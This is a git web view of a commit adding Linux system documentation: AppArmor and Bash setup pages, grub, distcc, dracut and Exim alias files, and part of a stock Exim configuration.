about summary refs log tree commit diff stats
path: root/linux
diff options
context:
space:
mode:
Diffstat (limited to 'linux')
-rw-r--r--linux/apparmor.html255
-rw-r--r--linux/bash.html165
-rw-r--r--linux/conf/apparmor/parser.conf2
-rw-r--r--linux/conf/default/grub4
-rw-r--r--linux/conf/distcc.conf3
-rw-r--r--linux/conf/dracut.conf19
-rw-r--r--linux/conf/exim/aliases37
-rw-r--r--linux/conf/exim/exim.conf892
-rw-r--r--linux/conf/fstab36
-rw-r--r--linux/conf/hosts20
-rw-r--r--linux/conf/iptables/Makefile4
-rw-r--r--linux/conf/iptables/blockedip17351
-rw-r--r--linux/conf/iptables/ip_blocker.c226
-rw-r--r--linux/conf/iptables/ipt-bridge.sh94
-rw-r--r--linux/conf/iptables/ipt-client.sh60
-rw-r--r--linux/conf/iptables/ipt-conf.sh47
-rw-r--r--linux/conf/iptables/ipt-firewall.sh313
-rw-r--r--linux/conf/iptables/ipt-open.sh17
-rw-r--r--linux/conf/iptables/ipt-server.sh49
-rw-r--r--linux/conf/iptables/ipt-start.sh34
-rw-r--r--linux/conf/iptables/ipt-stop.sh8
-rw-r--r--linux/conf/pkg-get.conf15
-rw-r--r--linux/conf/pkgmk.conf60
-rw-r--r--linux/conf/pkgmk.conf.harden117
-rw-r--r--linux/conf/ports.conf1
-rw-r--r--linux/conf/ports/6c37-dropin.httpup5
-rw-r--r--linux/conf/ports/6c37.httpup5
-rw-r--r--linux/conf/ports/compat-32.git7
-rw-r--r--linux/conf/ports/compat-32.pub2
-rw-r--r--linux/conf/ports/contrib.git7
-rw-r--r--linux/conf/ports/contrib.pub2
-rw-r--r--linux/conf/ports/core.git7
-rw-r--r--linux/conf/ports/core.pub2
-rw-r--r--linux/conf/ports/kde5.git7
-rw-r--r--linux/conf/ports/mate.git7
-rw-r--r--linux/conf/ports/mate.httpup.inactive5
-rw-r--r--linux/conf/ports/opt.git7
-rw-r--r--linux/conf/ports/opt.pub2
-rw-r--r--linux/conf/ports/utilities.git7
-rw-r--r--linux/conf/ports/xorg.git7
-rw-r--r--linux/conf/ports/xorg.pub2
-rw-r--r--linux/conf/prt-get.conf66
-rw-r--r--linux/conf/rc.conf12
-rwxr-xr-xlinux/conf/rc.d/distccd33
-rwxr-xr-xlinux/conf/rc.d/fcgiwrap41
-rwxr-xr-xlinux/conf/rc.d/git-daemon43
-rw-r--r--linux/conf/rc.d/iptables22
-rwxr-xr-xlinux/conf/rc.d/net54
-rwxr-xr-xlinux/conf/rc.d/postgresql16
-rwxr-xr-xlinux/conf/rc.d/wlan56
-rw-r--r--linux/conf/resolv.conf8
-rw-r--r--linux/conf/skel/.bash_profile8
-rw-r--r--linux/conf/skel/.bashrc73
-rw-r--r--linux/conf/skel/.gitconfig10
-rw-r--r--linux/conf/skel/.gnupg/gpg.conf136
-rw-r--r--linux/conf/skel/.mutt/external27
-rw-r--r--linux/conf/skel/.mutt/gpg.rc88
-rw-r--r--linux/conf/skel/.mutt/mail_alias0
-rw-r--r--linux/conf/skel/.mutt/muttrc60
-rw-r--r--linux/conf/skel/.mutt/system25
-rw-r--r--linux/conf/skel/.profile36
-rw-r--r--linux/conf/skel/.spectrwm.conf131
-rw-r--r--linux/conf/skel/.tmux.conf27
-rw-r--r--linux/conf/skel/.vim/backup/.gitignore0
-rw-r--r--linux/conf/skel/.vim/colors/wombat256mod.vim96
-rw-r--r--linux/conf/skel/.vim/swap/.gitignore0
-rw-r--r--linux/conf/skel/.vim/undodir/.gitignore0
-rw-r--r--linux/conf/skel/.vim/views/.gitignore0
-rw-r--r--linux/conf/skel/.vimrc156
-rw-r--r--linux/conf/skel/.xinitrc13
-rw-r--r--linux/conf/sudoers103
-rw-r--r--linux/conf/sysctl.conf160
-rw-r--r--linux/configure.html283
-rw-r--r--linux/dash.html28
-rw-r--r--linux/exim.html233
-rw-r--r--linux/fail2ban.html54
-rw-r--r--linux/hardening.html188
-rw-r--r--linux/index.html212
-rw-r--r--linux/install.html408
-rw-r--r--linux/linux.html866
-rw-r--r--linux/network.html476
-rw-r--r--linux/package.html190
-rw-r--r--linux/ports.html265
-rw-r--r--linux/ports/dracut/.footprint399
-rw-r--r--linux/ports/dracut/.md5sum3
-rw-r--r--linux/ports/dracut/Pkgfile25
-rwxr-xr-xlinux/ports/dracut/README5
-rw-r--r--linux/ports/dracut/dracut.conf16
-rw-r--r--linux/ports/linux-blob/.footprint49
-rw-r--r--linux/ports/linux-blob/.md5sum7
-rw-r--r--linux/ports/linux-blob/Pkgfile64
-rw-r--r--linux/ports/linux-blob/config-c94821
-rw-r--r--linux/ports/linux-blob/port-blob-cpu.patch11
-rw-r--r--linux/ports/linux-blob/port-blob-grsecurity.patch28
-rw-r--r--linux/ports/linux-blob/port-blob-make.patch11
-rw-r--r--linux/ports/linux-gnu/.footprint975
-rw-r--r--linux/ports/linux-gnu/.md5sum3
-rw-r--r--linux/ports/linux-gnu/Pkgfile42
-rw-r--r--linux/ports/linux-gnu/config-crux4892
-rw-r--r--linux/ports/linux-gnu/cpu_optimizations.patch533
-rw-r--r--linux/ports/linux-gnu/post-install5
-rw-r--r--linux/reboot.html232
-rw-r--r--linux/samhain.html265
-rw-r--r--linux/scripts/act-chroot.sh15
-rw-r--r--linux/scripts/backup-ports.sh136
-rw-r--r--linux/scripts/backup-system.sh194
-rw-r--r--linux/scripts/chroot.sh9
-rw-r--r--linux/scripts/install-core.sh179
-rwxr-xr-xlinux/scripts/mirror-system73
-rw-r--r--linux/scripts/pkgmk-test.conf19
-rw-r--r--linux/scripts/pkgmk-test.sh5
-rw-r--r--linux/scripts/portspage.patch27
-rwxr-xr-xlinux/scripts/replace.sh9
-rw-r--r--linux/scripts/restore-ports.sh53
-rw-r--r--linux/scripts/runvm/c12-dvd15
-rw-r--r--linux/scripts/runvm/profile/crux7
-rw-r--r--linux/scripts/runvm/runvm.sh26
-rw-r--r--linux/scripts/setup-core.sh154
-rw-r--r--linux/scripts/setup-gitolite.sh43
-rw-r--r--linux/scripts/setup-iso.sh144
-rw-r--r--linux/scripts/setup-nginx.sh24
-rw-r--r--linux/scripts/setup-openssh.sh43
-rw-r--r--linux/scripts/setup-php.sh7
-rw-r--r--linux/scripts/setup-postgresql.sh87
-rwxr-xr-xlinux/scripts/setup-target.sh224
-rw-r--r--linux/scripts/setup-virtual.sh78
-rw-r--r--linux/scripts/setup-x.sh96
-rw-r--r--linux/sysctl.html177
-rw-r--r--linux/toolchain.html187
-rw-r--r--linux/tty-terminal.html81
-rw-r--r--linux/wireless.html133
131 files changed, 39244 insertions, 0 deletions
diff --git a/linux/apparmor.html b/linux/apparmor.html
new file mode 100644
index 0000000..6cd6d4f
--- /dev/null
+++ b/linux/apparmor.html
@@ -0,0 +1,255 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+	<meta charset='utf-8'>
+	<title>2.6.1. AppArmor</title>
+    </head>
+    <body>
+
+	<a href="index.html">GNU/Linux Index</a>
+
+	<h1>2.6.1. AppArmor</h1>
+
+	<p>Check <a href="linux.html#configure">kernel configuration</a> or
+	use the provided with <a href="reboot.html#linux">linux-gnu</a> port
+	to support apparmor. <a href="https://gitlab.com/apparmor/apparmor/wikis/home">AppArmor</a> enforce rules on applications based
+	on security policies.</p>
+
+
+	<h2 id="install">2.6.1.1 Install</h2>
+
+	<p>User space tools are provided by apparmor port
+	and its dependencies, install them;</p>
+
+	<pre>
+	$ sudo prt-get depinst apparmor
+	</pre>
+
+	<p>Enable apparmor on linux by command line, create /etc/default/grub;</p>
+
+	<pre>
+	GRUB_CMDLINE_LINUX_DEFAULT="$GRUB_CMDLINE_LINUX_DEFAULT apparmor=1 security=apparmor"
+	</pre>
+
+	<p>Add SecurityFS to /etc/fstab;</p>
+
+	<pre>
+	none /sys/kernel/security securityfs defaults 0 0
+	</pre>
+
+	<p>Check status;</p>
+
+	<pre>
+	# apparmor_status
+	</pre>
+
+	<p>Utilities;</p>
+
+	<pre>
+	aa-audit           aa-disable         aa-genprof         aa-status
+	aa-autodep         aa-easyprof        aa-logprof         aa-unconfined
+	aa-cleanprof       aa-enabled         aa-mergeprof
+	aa-complain        aa-enforce         aa-notify
+	aa-decode          aa-exec            aa-remove-unknown
+	</pre>
+
+	<h2 id="configure">6.2.1.2 Configure</h2>
+
+	<p>Profiles are located at /etc/apparmor.d/ and
+	/usr/share/apparmor/extra-profiles contain profiles
+	that require testing;</p>
+
+	<pre>
+	# cp -r /usr/share/apparmor/extra-profiles/* /etc/apparmor.d/
+	# sudo rm /etc/apparmor.d/README
+	# bash /etc/rc.d/apparmor restart
+	</pre>
+
+	<h2 id="profiles">6.2.1.3 Profiles</h2>
+
+	<p>Profiles are parsed using
+	apparmor_parser;</p>
+
+	<pre>
+	Usage: apparmor_parser [options] [profile]
+
+	Options:
+	--------
+	-a, --add               Add apparmor definitions [default]
+	-r, --replace           Replace apparmor definitions
+	-R, --remove            Remove apparmor definitions
+	-C, --Complain          Force the profile into complain mode
+	-B, --binary            Input is precompiled profile
+	-N, --names             Dump names of profiles in input.
+	-S, --stdout            Dump compiled profile to stdout
+	-o n, --ofile n         Write output to file n
+	-b n, --base n          Set base dir and cwd
+	-I n, --Include n       Add n to the search path
+	-f n, --subdomainfs n   Set location of apparmor filesystem
+	-m n, --match-string n  Use only features n
+	-M n, --features-file n Use only features in file n
+	-n n, --namespace n     Set Namespace for the profile
+	-X, --readimpliesX      Map profile read permissions to mr
+	-k, --show-cache        Report cache hit/miss details
+	-K, --skip-cache        Do not attempt to load or save cached profiles
+	-T, --skip-read-cache   Do not attempt to load cached profiles
+	-W, --write-cache       Save cached profile (force with -T)
+	    --skip-bad-cache    Don't clear cache if out of sync
+	    --purge-cache       Clear cache regardless of its state
+	    --debug-cache       Debug cache file checks
+	-L, --cache-loc n       Set the location of the profile cache
+	-q, --quiet             Don't emit warnings
+	-v, --verbose           Show profile names as they load
+	-Q, --skip-kernel-load  Do everything except loading into kernel
+	-V, --version           Display version info and exit
+	-d [n], --debug         Debug apparmor definitions OR [n]
+	-p, --preprocess        Dump preprocessed profile
+	-D [n], --dump          Dump internal info for debugging
+	-O [n], --Optimize      Control dfa optimizations
+	-h [cmd], --help[=cmd]  Display this text or info about cmd
+	-j n, --jobs n          Set the number of compile threads
+	--max-jobs n            Hard cap on --jobs. Default 8*cpus
+	--abort-on-error        Abort processing of profiles on first error
+	--skip-bad-cache-rebuild Do not try rebuilding the cache if it is rejected by the kernel
+	--warn n                Enable warnings (see --help=warn)
+	</pre>
+
+	<h2 id="audit">2.6.1.4 Profile with audit</h2>
+
+	<p>Tools use log as a source to build profiles, it is
+	necessary to disable log rate limit;</p>
+
+	<pre>
+	# sysctl -w kernel.printk_ratelimit=0
+	</pre>
+
+	<p>Start aa-genprof;</p>
+
+	<pre>
+	$ sudo aa-genprof /usr/bin/lynx
+	</pre>
+
+	<p>Execute application with all common application options
+	and parts. After initial automatic configuration enable profile in
+	complain mode.</p>
+
+	<pre>
+	$ sudo aa-complain lynx
+	</pre>
+
+	<p>Use aa-logprof when rules need to be adapted.</p>
+
+	<pre>
+	# aa-logprof -f /var/log/kernel
+	</pre>
+
+	<p>Reload profile with the new settings;</p>
+
+	<pre>
+	# apparmor_parser -r lynx
+	</pre>
+
+	<p>Once profile rules become well defined enable profile in
+	enforce mode with aa-enforce;</p>
+
+	<p>Monitor logs with aa-notify;</p>
+
+	<pre>
+	# aa-notify --file=/var/log/kernel -u username -l
+	</pre>
+
+	<p>And keep adjusting the rules with logprof;</p>
+
+	<pre>
+	# aa-logprof -f /var/log/kernel
+	</pre>
+
+        <p>Apparmor will give several options such as;</p>
+
+        <dl>
+            <dt>Inherit ix</dt><dd>Creates a rule that is denoted by ix within the profile, causes the executed binary to inherit permissions from the parent profile.</dd>
+            <dt>Child cx</dt><dd>Creates a rule that is denoted by within the profile, requires a sub-profile to be created within the parent profile and rules must be separately generated for this child (prompts will appear when running scans on the parent).</dd>
+        </dl>
+
+	<h2 id="edit">2.6.1.5 Edit profiles</h2>
+
+	<h3>File Globing</h3>
+
+	<dl>
+	    <dt>/dir/file</dt><dd>match a specific file</dd>
+	    <dt>/dir/*</dt><dd>match any files in a directory (including dot files)</dd>
+	    <dt>/dir/a*</dt><dd>match any file in a directory starting with 'a'</dd>
+	    <dt>/dir/*.png</dt><dd>match any file in a directory ending with '.png'</dd>
+	    <dt>/dir/[^.]*</dt><dd>match any file in a directory except dot files</dd>
+	    <dt>/dir/</dt><dd>match a directory</dd>
+	    <dt>/dir/*/</dt><dd>match any directory within /dir/</dd>
+	    <dt>/dir/a*/</dt><dd>match any directory within /dir/ starting with a</dd>
+	    <dt>/dir/*a/</dt><dd>match any directory within /dir/ ending with a</dd>
+	    <dt>/dir/**</dt><dd>match any file or directory in or below /dir/</dd>
+	    <dt>/dir/**/</dt><dd>match any directory in or below /dir/</dd>
+	    <dt>/dir/**[^/]</dt><dd>match any file in or below /dir/</dd>
+	    <dt>/dir{,1,2}/**</dt><dd> - match any file or directory in or below /dir/, /dir1/, and /dir2/</dd>
+	</dl>
+
+	<h3>File Permissions</h3>
+
+	<dl>
+	    <dt>r</dt><dd>read</dd>
+	    <dt>w</dt><dd>write</dd>
+	    <dt>a</dt><dd>append (implied by w)</dd>
+	    <dt>m</dt><dd>memory map executable</dd>
+	    <dt>k</dt><dd>lock (requires r or w, AppArmor 2.1 and later)</dd>
+	    <dt>l</dt><dd>link</dd>
+
+	    <dt>x</dt><dd>execute</dd>
+	</dl>
+
+	<dl>
+	    <dt>ux</dt><dd>Execute unconfined (preserve environment) -- WARNING: should only be used in very special cases</dd>
+	    <dt>Ux</dt><dd>Execute unconfined (scrub the environment)</dd>
+	    <dt>px</dt><dd>Execute under a specific profile (preserve the environment) -- WARNING: should only be used in special cases</dd>
+	    <dt>Px</dt><dd>Execute under a specific profile (scrub the environment)</dd>
+	    <dt>pix</dt><dd>as px but fallback to inheriting the current profile if the target profile is not found</dd>
+	    <dt>Pix</dt><dd>as Px but fallback to inheriting the current profile if the target profile is not found</dd>
+	    <dt>pux</dt><dd>as px but fallback to executing unconfined if the target profile is not found</dd>
+	    <dt>Pux</dt><dd>as Px but fallback to executing unconfined if the target profile is not found</dd>
+	    <dt>ix<dt><dd>Execute and inherit the current profile</dd>
+	    <dt>cx<dt><dd>Execute and transition to a child profile (preserve the environment)</dd>
+	    <dt>Cx<dt><dd>Execute and transition to a child profile (scrub the environment)</dd>
+	    <dt>cix<dt><dd>as cx but fallback to inheriting the current profile if the target profile is not found</dd>
+	    <dt>Cix<dt><dd>as Cx but fallback to inheriting the current profile if the target profile is not found</dd>
+	    <dt>cux<dt><dd>as cx but fallback to executing unconfined if the target profile is not found</dd>
+	    <dt>Cux<dt><dd>as Cx but fallback to executing unconfined if the target profile is not found</dd>
+	</dl>
+
+	<p>The owner keyword can be used as a qualifier making permission conditional on owning the file (process fsuid == file's uid).</p>
+
+	<p>Read <a href="https://gitlab.com/apparmor/apparmor/-/wikis/QuickProfileLanguage">Profile Language</a> for more information.</p>
+
+	<h2 id="speedup">2.6.1.6 Speedup startup</h2>
+
+	<p>Every time apparmor loads a profile in text it needs
+	to compile into binary format, this takes some time if
+	there is many profiles to load at boot time. To optimize
+	edit /etc/apparmor/parser.conf;</p>
+
+	<pre>
+	## Turn creating/updating of the cache on by default
+	write-cache
+	</pre>
+
+	<p>To change default location add;</p>
+
+	<pre>
+	chache-loc=/var/cache/apparmor
+	</pre>
+
+	<a href="index.html">GNU/Linux Index</a>
+	<p>This is part of the LeetIO System Documentation.
+	Copyright (C) 2021
+	LeetIO Team.
+	See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+	for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/bash.html b/linux/bash.html
new file mode 100644
index 0000000..7b98eb5
--- /dev/null
+++ b/linux/bash.html
@@ -0,0 +1,165 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.3.2. Bash</title>
+    </head>
+    <body>
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1 id="bash">2.3.2. Bash</h1>
+
+        <p>Just to be sure, setup bash as default login;<p>
+
+        <pre>
+        $ chsh
+        </pre>
+
+        <p>Description of configuration files;</p>
+
+        <dl>
+            <dt>~/.bash_profile</dt>
+            <dd>Minimal file that just load .profile and then .bashrc,
+            in this order.</dd>
+
+            <dt>~/.profile<dt>
+            <dd>Not specifically related to bash, such as
+            environment variables (PATH). Only for login shells (sh)
+            or graphical applications.</dd>
+
+            <dt>~/.bashrc</dt>
+            <dd>Related to interactive command line, such as bash
+            alias, editor.</dd>
+        </dl>
+
+        <h2 id="profile">2.3.2.1. Profile</h2>
+
+        <p>Example of ~/.profile;</p>
+
+        <pre>
+	export GPG_AGENT_INFO  # the env file does not contain the export statement
+	export SSH_AUTH_SOCK   # enable gpg-agent for ssh
+
+	export GPGKEY=XXXXXXXX
+
+	# ssh-agent to ask only ounce for password
+	SSH_ENV="$HOME/.ssh/environment"
+	function start_agent {
+	    echo "Initialising new SSH agent..."
+	    /usr/bin/ssh-agent | sed 's/^echo/#echo/' > "${SSH_ENV}"
+	    echo succeeded
+	    chmod 600 "${SSH_ENV}"
+	    . "${SSH_ENV}" > /dev/null
+	    /usr/bin/ssh-add;
+	}
+
+	# Source SSH settings, if applicable
+	if [ -f "${SSH_ENV}" ]; then
+	    . "${SSH_ENV}" > /dev/null
+	    #ps ${SSH_AGENT_PID} doesn't work under cywgin
+	    ps -ef | grep ${SSH_AGENT_PID} | grep ssh-agent$ > /dev/null || {
+		start_agent;
+	    }
+	else
+	    start_agent;
+	fi
+
+	# Weston
+	if test -z "${XDG_RUNTIME_DIR}"; then
+	    export XDG_RUNTIME_DIR=/tmp/${UID}-runtime-dir
+	    if ! test -d "${XDG_RUNTIME_DIR}"; then
+		mkdir "${XDG_RUNTIME_DIR}"
+		chmod 0700 "${XDG_RUNTIME_DIR}"
+	    fi
+fi        </pre>
+
+        <h2 id="bashrc">2.3.2.2. Bash RC</h2>
+
+        <p>Example of ~/.bashrc;</p>
+
+        <pre>
+        # If not running interactively, don't do anything
+        case $- in
+                *i*) ;;
+                *) return;;
+        esac
+
+
+        # check the window size after each command and, if necessary,
+        # update the values of LINES and COLUMNS.
+        shopt -s checkwinsize
+
+
+        # don't put duplicate lines or lines starting with space in the history.
+        # See bash(1) for more options
+        HISTCONTROL=ignoreboth
+
+        # append to the history file, don't overwrite it
+        shopt -s histappend
+
+        # for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
+        HISTSIZE=1000
+        HISTFILESIZE=2000
+
+        alias tmux="tmux -2"
+
+        alias rm='rm -i'
+        #alias cp='cp -i'
+        alias mv='mv -i'
+        # Prevents accidentally clobbering files.
+        alias mkdir='mkdir -p'
+
+        alias h='history'
+        alias j='jobs -l'
+        alias which='type -a'
+        alias ..='cd ..'
+
+        # Generate a password
+        genpasswd () {
+            local l=$1
+            [ "$l" == "" ] && l=20
+            tr -dc A-Za-z0-9_ &lt; /dev/urandom | head -c ${l} | xargs
+        }
+
+        # Git graph log
+        glog () {
+            git log --graph --abbrev-commit --decorate --date=relative --all
+        }
+
+        if [[ -z "$TMUX" ]] ;then
+            ID="`tmux ls | grep -vm1 attached | cut -d: -f1`" # get the id of a deattached session
+            if [[ -z "$ID" ]] ;then # if not available create a new one
+                tmux new-session
+            else
+                tmux attach-session -t "$ID" # if available attach to it
+            fi
+        fi
+        </pre>
+
+        <h2 id="bash_profile">2.3.2.3. Bash profile</h2>
+
+        <p>Example of ~/.bash_profile;</p>
+
+        <pre>
+                #!/bin/bash
+                if [ -f ~/.profile ]; then
+                   source ~/.profile
+                fi
+
+                if [ -f ~/.bashrc ]; then
+                   source ~/.bashrc
+                fi
+        </pre>
+
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>
+        This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+
+    </body>
+</html>
diff --git a/linux/conf/apparmor/parser.conf b/linux/conf/apparmor/parser.conf
new file mode 100644
index 0000000..673d30a
--- /dev/null
+++ b/linux/conf/apparmor/parser.conf
@@ -0,0 +1,2 @@
+## Turn creating/updating of the cache on by default
+write-cache
diff --git a/linux/conf/default/grub b/linux/conf/default/grub
new file mode 100644
index 0000000..e1a4636
--- /dev/null
+++ b/linux/conf/default/grub
@@ -0,0 +1,4 @@
+GRUB_DISABLE_LINUX_UUID=false
+GRUB_ENABLE_LINUX_LABEL=false
+GRUB_CMDLINE_LINUX="rd.luks.uuid=luks-15f15024-e994-43e3-9de4-694ba94aaf7f rd.lvm.lv=vg_system/lv_root apparmor=1 security=apparmor"
+GRUB_ENABLE_CRYPTODISK=y
diff --git a/linux/conf/distcc.conf b/linux/conf/distcc.conf
new file mode 100644
index 0000000..723338b
--- /dev/null
+++ b/linux/conf/distcc.conf
@@ -0,0 +1,3 @@
+DISTCC_ALLOW="10.0.0.0/8"
+DISTCC_USER="pkgmk"
+DISTCC_LOG_LEVEL="info"
diff --git a/linux/conf/dracut.conf b/linux/conf/dracut.conf
new file mode 100644
index 0000000..eda69fd
--- /dev/null
+++ b/linux/conf/dracut.conf
@@ -0,0 +1,19 @@
+# PUT YOUR CONFIG IN separate files
+# in /etc/dracut.conf.d named "<name>.conf"
+
+# Equivalent to -H
+hostonly="no"
+
+# Mount / and /usr read-only by default.
+ro_mnt="yes"
+
+# Equivalent to -m "module module module"
+dracutmodules+="dash kernel-modules rootfs-block udev-rules usrmount base fs-lib shutdown"
+
+# Equivalent to -a "module"
+add_dracutmodules+="caps debug crypt lvm"
+
+# Equivalent to -o "module"
+omit_dracutmodules+="systemd systemd-bootchart systemd-networkd systemd-initrd"
+
+# SEE man dracut.conf(5) for options
diff --git a/linux/conf/exim/aliases b/linux/conf/exim/aliases
new file mode 100644
index 0000000..2849996
--- /dev/null
+++ b/linux/conf/exim/aliases
@@ -0,0 +1,37 @@
+# Default aliases file, installed by Exim. This file contains no real aliases.
+# You should edit it to taste.
+
+# The following alias is required by the mail RFCs 2821 and 2822.
+# Set it to the address of a HUMAN who deals with this system's mail problems.
+
+postmaster: machine-admin
+
+# It is also common to set the following alias so that if anybody replies to a
+# bounce message from this host, the reply goes to the postmaster.
+
+mailer-daemon: postmaster
+
+# You should also set up an alias for messages to root, because it is not
+# usually a good idea to deliver mail as root.
+
+root: postmaster
+
+# It is a good idea to redirect any messages sent to system accounts so tha
+# they don't just get ignored. Here are some common examples:
+
+bin: root
+daemon: root
+ftp: root
+nobody: root
+operator: root
+uucp: root
+
+# You should check your /etc/passwd for any others.
+
+# Other commonly enountered aliases are:
+#
+# abuse:       the person dealing with network and mail abuse
+# hostmaster:  the person dealing with DNS problems
+# webmaster:   the person dealing with your web site
+
+####
diff --git a/linux/conf/exim/exim.conf b/linux/conf/exim/exim.conf
new file mode 100644
index 0000000..074c8af
--- /dev/null
+++ b/linux/conf/exim/exim.conf
@@ -0,0 +1,892 @@
+######################################################################
+#                  Runtime configuration file for Exim               #
+######################################################################
+
+
+# This is a default configuration file which will operate correctly in
+# uncomplicated installations. Please see the manual for a complete list
+# of all the runtime configuration options that can be included in a
+# configuration file. There are many more than are mentioned here. The
+# manual is in the file doc/spec.txt in the Exim distribution as a plain
+# ASCII file. Other formats (PostScript, Texinfo, HTML, PDF) are available
+# from the Exim ftp sites. The manual is also online at the Exim web sites.
+
+
+# This file is divided into several parts, all but the first of which are
+# headed by a line starting with the word "begin". Only those parts that
+# are required need to be present. Blank lines, and lines starting with #
+# are ignored.
+
+
+########### IMPORTANT ########## IMPORTANT ########### IMPORTANT ###########
+#                                                                          #
+# Whenever you change Exim's configuration file, you *must* remember to    #
+# HUP the Exim daemon, because it will not pick up the new configuration   #
+# until you do. However, any other Exim processes that are started, for    #
+# example, a process started by an MUA in order to send a message, will    #
+# see the new configuration as soon as it is in place.                     #
+#                                                                          #
+# You do not need to HUP the daemon for changes in auxiliary files that    #
+# are referenced from this file. They are read every time they are used.   #
+#                                                                          #
+# It is usually a good idea to test a new configuration for syntactic      #
+# correctness before installing it (for example, by running the command    #
+# "exim -C /config/file.new -bV").                                         #
+#                                                                          #
+########### IMPORTANT ########## IMPORTANT ########### IMPORTANT ###########
+
+
+
+######################################################################
+#                    MAIN CONFIGURATION SETTINGS                     #
+######################################################################
+#
+
+# Specify your host's canonical name here. This should normally be the fully
+# qualified "official" name of your host. If this option is not set, the
+# uname() function is called to obtain the name. In many cases this does
+# the right thing and you need not set anything explicitly.
+
+# primary_hostname =
+
+
+# The next three settings create two lists of domains and one list of hosts.
+# These lists are referred to later in this configuration using the syntax
+# +local_domains, +relay_to_domains, and +relay_from_hosts, respectively. They
+# are all colon-separated lists:
+
+domainlist local_domains = @ : localhost
+domainlist relay_to_domains =
+hostlist   relay_from_hosts = localhost
+# (We rely upon hostname resolution working for localhost, because the default
+# uncommented configuration needs to work in IPv4-only environments.)
+
+# Most straightforward access control requirements can be obtained by
+# appropriate settings of the above options. In more complicated situations,
+# you may need to modify the Access Control Lists (ACLs) which appear later in
+# this file.
+
+# The first setting specifies your local domains, for example:
+#
+#   domainlist local_domains = my.first.domain : my.second.domain
+#
+# You can use "@" to mean "the name of the local host", as in the default
+# setting above. This is the name that is specified by primary_hostname,
+# as specified above (or defaulted). If you do not want to do any local
+# deliveries, remove the "@" from the setting above. If you want to accept mail
+# addressed to your host's literal IP address, for example, mail addressed to
+# "user@[192.168.23.44]", you can add "@[]" as an item in the local domains
+# list. You also need to uncomment "allow_domain_literals" below. This is not
+# recommended for today's Internet.
+
+# The second setting specifies domains for which your host is an incoming relay.
+# If you are not doing any relaying, you should leave the list empty. However,
+# if your host is an MX backup or gateway of some kind for some domains, you
+# must set relay_to_domains to match those domains. For example:
+#
+# domainlist relay_to_domains = *.myco.com : my.friend.org
+#
+# This will allow any host to relay through your host to those domains.
+# See the section of the manual entitled "Control of relaying" for more
+# information.
+
+# The third setting specifies hosts that can use your host as an outgoing relay
+# to any other host on the Internet. Such a setting commonly refers to a
+# complete local network as well as the localhost. For example:
+#
+# hostlist relay_from_hosts = <; 127.0.0.1 ; ::1 ; 192.168.0.0/16
+#
+# The "/16" is a bit mask (CIDR notation), not a number of hosts. Note that you
+# have to include 127.0.0.1 if you want to allow processes on your host to send
+# SMTP mail by using the loopback address. A number of MUAs use this method of
+# sending mail.  Often, connections are made to "localhost", which might be ::1
+# on IPv6-enabled hosts.  Do not forget CIDR for your IPv6 networks.
+
+# All three of these lists may contain many different kinds of item, including
+# wildcarded names, regular expressions, and file lookups. See the reference
+# manual for details. The lists above are used in the access control lists for
+# checking incoming messages. The names of these ACLs are defined here:
+
+acl_smtp_rcpt = acl_check_rcpt
+acl_smtp_data = acl_check_data
+
+# You should not change those settings until you understand how ACLs work.
+
+
+# If you are running a version of Exim that was compiled with the content-
+# scanning extension, you can cause incoming messages to be automatically
+# scanned for viruses. You have to modify the configuration in two places to
+# set this up. The first of them is here, where you define the interface to
+# your scanner. This example is typical for ClamAV; see the manual for details
+# of what to set for other virus scanners. The second modification is in the
+# acl_check_data access control list (see below).
+
+# av_scanner = clamd:/tmp/clamd
+
+
+# For spam scanning, there is a similar option that defines the interface to
+# SpamAssassin. You do not need to set this if you are using the default, which
+# is shown in this commented example. As for virus scanning, you must also
+# modify the acl_check_data access control list to enable spam scanning.
+
+# spamd_address = 127.0.0.1 783
+
+
+# If Exim is compiled with support for TLS, you may want to enable the
+# following options so that Exim allows clients to make encrypted
+# connections. In the authenticators section below, there are template
+# configurations for plaintext username/password authentication. This kind
+# of authentication is only safe when used within a TLS connection, so the
+# authenticators will only work if the following TLS settings are turned on
+# as well.
+
+# Allow any client to use TLS.
+
+tls_advertise_hosts = *
+
+# Specify the location of the Exim server's TLS certificate and private key.
+# The private key must not be encrypted (password protected). You can put
+# the certificate and private key in the same file, in which case you only
+# need the first setting, or in separate files, in which case you need both
+# options.
+
+tls_certificate = /etc/ssl/certs/exim.crt
+tls_privatekey = /etc/ssl/keys/exim.key
+
+# In order to support roaming users who wish to send email from anywhere,
+# you may want to make Exim listen on other ports as well as port 25, in
+# case these users need to send email from a network that blocks port 25.
+# The standard port for this purpose is port 587, the "message submission"
+# port. See RFC 4409 for details. Microsoft MUAs cannot be configured to
+# talk the message submission protocol correctly, so if you need to support
+# them you should also allow TLS-on-connect on the traditional but
+# non-standard port 465.
+
+daemon_smtp_ports = 25 : 465 : 587
+tls_on_connect_ports = 465
+
+
+# Specify the domain you want to be added to all unqualified addresses
+# here. An unqualified address is one that does not contain an "@" character
+# followed by a domain. For example, "caesar@rome.example" is a fully qualified
+# address, but the string "caesar" (i.e. just a login name) is an unqualified
+# email address. Unqualified addresses are accepted only from local callers by
+# default. See the recipient_unqualified_hosts option if you want to permit
+# unqualified addresses from remote sources. If this option is not set, the
+# primary_hostname value is used for qualification.
+
+# qualify_domain =
+
+
+# If you want unqualified recipient addresses to be qualified with a different
+# domain to unqualified sender addresses, specify the recipient domain here.
+# If this option is not set, the qualify_domain value is used.
+
+# qualify_recipient =
+
+
+# The following line must be uncommented if you want Exim to recognize
+# addresses of the form "user@[10.11.12.13]" that is, with a "domain literal"
+# (an IP address) instead of a named domain. The RFCs still require this form,
+# but it makes little sense to permit mail to be sent to specific hosts by
+# their IP address in the modern Internet. This ancient format has been used
+# by those seeking to abuse hosts by using them for unwanted relaying. If you
+# really do want to support domain literals, uncomment the following line, and
+# see also the "domain_literal" router below.
+
+# allow_domain_literals
+
+
+# No deliveries will ever be run under the uids of users specified by
+# never_users (a colon-separated list). An attempt to do so causes a panic
